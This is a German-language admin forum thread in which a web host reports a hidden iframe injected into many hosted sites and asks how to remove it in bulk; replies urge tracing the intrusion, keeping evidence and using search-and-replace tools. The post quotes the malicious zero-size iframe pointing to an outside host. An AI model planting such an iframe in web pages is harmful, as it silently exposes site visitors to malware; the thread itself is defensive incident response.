beaxx
Goto Top

Auf dem Webserver hat sich ein gefährlicher Code eingeschlichen

Hallo,

Auf unseren Webserver hat sich ein gefährlicher Code eingeschlichen

<iframe src=http://www.haola123123.com/hkeraone/hker.htm widht=0 height=0></iframe>

jetzt meine Frage

Wir hosten mehrer Website wie lösche ich dieses Iframe von allen Websiten die wir hosten in einen zug oder bleibt mir nichts anderes über als alle Websiten durchgehn und sie händisch rauslöschen?? hat da wer schon erfahren

frage zwei
kennt dieses iframe wer bzw. was für einen schaden richtet es an? bislang hab ich nicht wirklich was drüber gefunden


danke in voraus

mfg

Content-Key: 84312

Url: https://administrator.de/contentid/84312

Printed on: April 16, 2024 at 12:04 o'clock

Mitglied: 60730
60730 Mar 31, 2008 at 08:00:32 (UTC)
Goto Top
Frage 3:
Was ist das für ein Webserver und 3b) wie ist er da drauf gekommen?

Entweder manuell mit Grep suchen oder mit Windows Boardsuche.

Nicht einfach löschen, sondern rausfinden, wie er auf dein System gekommen ist - das ist deine Aufgabe!
Member: beaxx
beaxx Mar 31, 2008 at 08:08:39 (UTC)
Goto Top
Frage 3:
Was ist das für ein Webserver und 3b)
wie ist er da drauf gekommen?

Entweder manuell mit Grep suchen oder mit
Windows Boardsuche.

Nicht einfach löschen, sondern
rausfinden, wie er auf dein System gekommen
ist - das ist deine Aufgabe!

Windows 2000 Server
tja das ist eine gute frage muß von ausserhalb irgendwie draufgekommen sein

tja herausfinden ist so eine sache der code gehört dringend von allen websiten entfernd dann kann ich mich drum kümmern wie er draufgekommen ist bei einer manuellen löschung sitz ich einen tag dabei face-sad
Member: Gahmuret
Gahmuret Mar 31, 2008 at 08:18:14 (UTC)
Goto Top
Hallo beaxx,

Timo hat Recht. Du solltest zumindest eine Kopie der infizierten Seiten erstellen um sie zu analysieren.
Spiel doch einfach die Sicherung der Webseiten über die infizierten.

Schöne Grüße
Member: beaxx
beaxx Mar 31, 2008 at 08:29:35 (UTC)
Goto Top
Hallo beaxx,

Timo hat Recht. Du solltest zumindest eine
Kopie der infizierten Seiten erstellen um sie
zu analysieren.
Spiel doch einfach die Sicherung der
Webseiten über die infizierten.

Schöne Grüße

Kopie hab ich schon erstellt ich werd mich nachher auch dann ausführlich beschäftigen was der überhaupt macht nur wie ich schon gesagt hab gehört er dringend von allen websiten so schnell wie möglich entfernd
tja die sicherung einspielen an das hab ich auch schon gedacht nur ich dachte es gäbe eine einfachere lösung weils eh immer der selbe code ist der zum entfernen ist

viele grüße
Mitglied: 60730
60730 Mar 31, 2008 at 08:39:43 (UTC)
Goto Top
ich dachte es
gäbe eine einfachere lösung weils
eh immer der selbe code ist der zum entfernen
ist

viele grüße

Hi,

geh mit dem Explorer auf den Webroot und drücke [F3] suchen:

Nach dateien suchen, deren inhalt "widht=0 height=0></iframe>" ist und durch den ganzen Baum suchen lassen, die Fundstellen ansehen. Wenn "nur" hker.htm darunter ist - diese htm. Datei umbenennen, dann "passiert" nicht mehr viel. Wenn du Sie löscht, kannst du nicht mehr rausfinden, wer und wann die Datei raufgespielt hat.

Nun rausfinden, wann diese Datei auf dem Server gelandet ist und ganz genau nachforschen, was wer und wie diese Datei auf die Maschine gekommen ist.
Dann kannste die auch löschen.
Member: beaxx
beaxx Mar 31, 2008 at 12:31:33 (UTC)
Goto Top
Hallo,

sodale jetzt hab ich nochmal nachgeschaut mit sicherung einspielen is nicht leider ist die letzte sicherung schon zu lange aus das das einspielen keinen sinn macht

ich hab mal eine website kopiert um nachher nachforschungen anzustellen wie was wo das herkommt

jetzt bräucht ich nur ein tool wie ich denn code von denn restlichen websiten weg bekomme
es sind html , aspx vb und dll datein betroffen anonst werd ich wohl eine woche brauchen bis ich denn code von jeder website händisch entferne

bin für jeden hinweis dankbar

mfg
Mitglied: 60730
60730 Mar 31, 2008 at 13:38:30 (UTC)
Goto Top
Hi,

du liesst offensichtlich meine Postings nicht richtig?

Wenn du die Datei kopierst, wer hat die Datei erzeugt? Richtig du....
Von daher wird das dann mit dem Nachforschen unmöglich.

Ist es immer die gleiche Datei - die den Iframe ausmacht?

Auch auf die Gefahr, dass du möglicherweise auch diesen Post nicht verstehst unter:

http://www.inforapid.de/html/srdownload.htm

diesem Link gibts ein Such und Ersetz Werkzeug.

Auf jeden Fall vorher eine Datensicherung machen, wenigstens jetzt face-wink

Bevor du die Einbruchsquelle nicht gefunden hast, ist nicht sicher - oder doch, das der Kram ratzfatz wieder auf dem System landet.